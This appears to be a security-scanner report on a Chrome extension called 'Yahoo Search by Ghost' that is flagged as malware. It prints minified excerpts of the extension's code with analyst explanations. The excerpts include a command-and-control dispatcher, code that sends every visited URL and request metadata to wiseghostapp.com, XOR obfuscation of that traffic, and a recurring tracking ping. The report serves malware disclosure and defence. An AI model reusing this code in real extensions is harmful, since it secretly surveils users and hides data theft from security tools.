Security Alert: Confirmed Malware
Yahoo Search by Ghost
ID: eoclijfghiglinncpceohgaigfgnlbim
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- https://wiseghostapp.comView Profile
- Privacy
- Privacy Policy
- Help
- Help Center
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- Yes
- Mailbox exists
- Yes
- Website
- Visit
Change your default search to Yahoo.
Switch to Yahoo effortlessly with our Chrome extension! Tailored for those who appreciate Yahoo's search features, this extension seamlessly sets Yahoo as your default search engine on Chrome. With a single installation, access Yahoo's search results, image search, and AI. Whether you're researching, shopping, or exploring new topics, our extension ensures Yahoo's comprehensive search tools are always available.
Implements a sophisticated Command and Control (C2) bot system capable of receiving and executing various remote commands. These include tab and window manipulation, cookie exfiltration, extension reloading, and most critically, remote script injection into any webpage via iframes.
let $e = [new ie, new ae, new ce, new se, new ue, new fe, new le, new he, new pe, new de, new ye, new ve, new me, new we, new ge, new be];async function ze(t, e, n, r) { await Vr("run_done", { type: t, extra: r, bid: e, cid: n });}async function Ye(t) { try { const e = []; for (const n of t.lst) e.push(qe(n, t.batchId)); await Promise.all(e); } catch (t) { wo(t, "hitpError"); }}async function qe(t, e) { try { t.deferMs && await Object(mt.i)(t.deferMs); let n = null, r = !1; for (const e of $e) { const o = await e.r(t); if (o.rel) { r = !0, n = o.extra; break; } } if (!r) throw Error(`invalid response: ${t.type}`); await ze(t.type, e, t.id, n); } catch (n) { wo(n, `exeption running: [${e}] at: [${t}] `); }}Exfiltrates every URL visited by the user to a remote server ('wiseghostapp.com') under the guise of a 'risk' score check. This constitutes unauthorized broad-scale data collection and user tracking without explicit consent or functional necessity.
async function ln(t) { let e = null == t ? void 0 : t.url; const n = null == t ? void 0 : t.id; if (e || (e = un, chrome.runtime.getManifest() .host_permissions.includes("<all_urls>") && (e = fn)), cn(e)) return an; await nn(); const r = await tt(); let o = e; e !== fn && e !== un && (o = v(e)); const i = (await ct()) .productType === P.SEC_RATE, a = await Ze.get(o); if (a) return void 0, a; void 0; const c = n && zn(n), s = n && $n(n), u = lt(r.vLvl), f = ht(r.vLvl), l = { url: u ? e : o, tabId: n, chain: c && u ? c.chain : null, ref: c && u ? c.referrer : null, isSiteRateExt: i, t: (null == t ? void 0 : t.title) || "", ts: s || null }; let h = l; u && (h = Je(Je({}, l), await Yn(n))); let p = null; return f && (p = await Vr("risk", h)), p ? (0 !== o.indexOf(sn) && (p.skipCache ? void 0 : (await Ze.insert(o, p), await rn())), p) : on;}Implements custom XOR obfuscation (with key 255) for both outgoing and incoming network communication with a remote server. This masks the content of data exfiltration and Command and Control (C2) instructions, making detection by traditional security tools more difficult.
const f = c.v ? c.v : 255, l = c.l ? c.l : "x-binary";async function h(t, e) { if (c.r) return; const { timeout: n } = e, r = new AbortController, o = setTimeout((() => r.abort()), n), i = r.signal, a = await fetch(t, u( u({}, e), {}, { signal: i })); return clearTimeout(o), a;}function d(e) { for (var n = t.from(e, "utf8"), r = 0; r < n.length; r++) n[r] ^= f; return n.toString("base64");}function y(e) { for (var n = t.alloc(e.length), r = 0; r < e.length; r++) n[r] = e.charCodeAt(r) ^ f; return (new TextDecoder) .decode(n);}Intercepts and collects detailed metadata about the user's network requests, including URLs, methods, and status codes. This data is batched and exfiltrated to the remote server, enabling comprehensive monitoring of the user's online activities.
async function Cn(t, e, n, r) { delete n.schema, delete n.query, delete n.port, delete n.pathname, delete n.hostname, delete n.hash; const o = { cid: t, type: e, data: n, item_id: Object(mt.a)() }; r && i()(o, r), i()(o, await Yn(n.tabId)), i()(o, await Un(n.tabId, n.frame)), wn.push(o);}The content script periodically pings a remote server ('wiseghostapp.com') with the current domain and extension version every 30 seconds. This ensures persistent tracking of user browsing activity even if the connection to the main background script is interrupted.
function i() { if (o) return void 0, void 0; try { chrome.runtime.connect() .disconnect(), setTimeout(i, 3e4); } catch (e) { void 0; const t = new URL(n); t.searchParams.set("domain", document.location.hostname), t.searchParams.set("version", r), (new Image) .src = t.toString(); }}By severity
Versions scanned
Showing 1 of 4 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 1.2.4125 | 5 |
Files with findings
2 distinct paths — top paths by unique finding count:
- background.js4
- ghostKA.js1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Code Diff
Compare extension code between any two versions.
No comparable text files found between these versions.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.